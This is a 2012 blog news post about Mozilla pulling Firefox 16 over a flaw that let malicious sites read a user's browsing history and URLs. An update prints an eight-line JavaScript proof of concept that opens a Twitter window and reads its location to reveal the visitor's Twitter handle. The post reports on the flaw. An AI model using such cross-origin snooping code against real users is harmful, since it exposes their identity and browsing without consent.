Firefox 16 pulled from downloads due to security bug which leaks browser history [UPDATE]

// October 11th, 2012 // Hacking and Security

Firefox logoNo sooner had Firefox hit the download site, it was being pulled because of a security flaw. Firefox 16 is currently offline as Mozilla fixes a bug that would allow malicious sites to access the browser’s history.

“The vulnerability could allow a malicious site to potentially determine which websites users have visited and have access to the URL or URL parameters. At this time we have no indication that this vulnerability is currently being exploited in the wild.”

There are no reports of the vulnerability being exploited but Firefox said users may consider downgrading until the bug is fixed. The question now, can Firefox equal (or surpass) Google’s 12-hour Chrome release window…

UPDATE: Mozilla better move fast.  As it turns out, even a 12 hour turnaround is not fast enough.  The exploit code is already available in the wild in a proof of concept demonstration that forced Firefox 16 to identify a visitor’s Twitter handle whenever the user was logged in to the site. The eight-line code sample takes about 10 seconds to reveal the username.  Code below.

function poc() {
var win = window.open(‘https://twitter.com/lists/’, ‘newWin’, ‘width=200,height=200’);
setTimeout(function()
{
alert(‘Hello ‘+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])
}, 5000);
}

 





« « Previous Article: So faster-than-light travel may be possible after all     » » Next Article: Best Comic Book Covers – 2012-10-10


Leave a Reply

You must be logged in to post a comment.

%d bloggers like this: